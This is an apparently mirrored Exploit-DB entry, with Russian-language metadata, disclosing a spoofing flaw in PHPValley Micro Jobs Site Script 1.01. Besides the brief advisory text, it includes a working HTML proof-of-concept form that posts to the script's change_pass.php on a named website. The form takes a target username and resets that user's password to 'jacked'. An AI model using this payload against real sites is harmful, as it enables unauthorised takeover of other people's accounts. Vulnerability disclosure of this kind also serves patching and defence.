- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38499
- Проверка EDB
-
- Пройдено
- Автор
- JASON WHELAN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2013-04-27
PHPValley Micro Jobs Site Script - Spoofing
HTML:
source: https://www.securityfocus.com/bid/59536/info
PHPValley Micro Jobs Site Script is prone to a vulnerability that allows attackers to spoof another user.
Attackers can exploit this issue to spoof another user; other attacks are also possible.
PHPValley Micro Jobs Site Script 1.01 is vulnerable; other versions may also be affected.
<!-- be logged into your own account, edit info below: -->
<form method="post" action="http://webfiver.com/change_pass.php">
<input name="changepass" type="hidden" value="Update" />
Target Username: <input name="auser" type="text" />
Your Password: <input name="cpass" type="password" />
<input name="npass" type="hidden" value="jacked" />
<input name="npassc" type="hidden" value="jacked" />
<input type="submit" value="Jack" />
</form>- Источник
- www.exploit-db.com
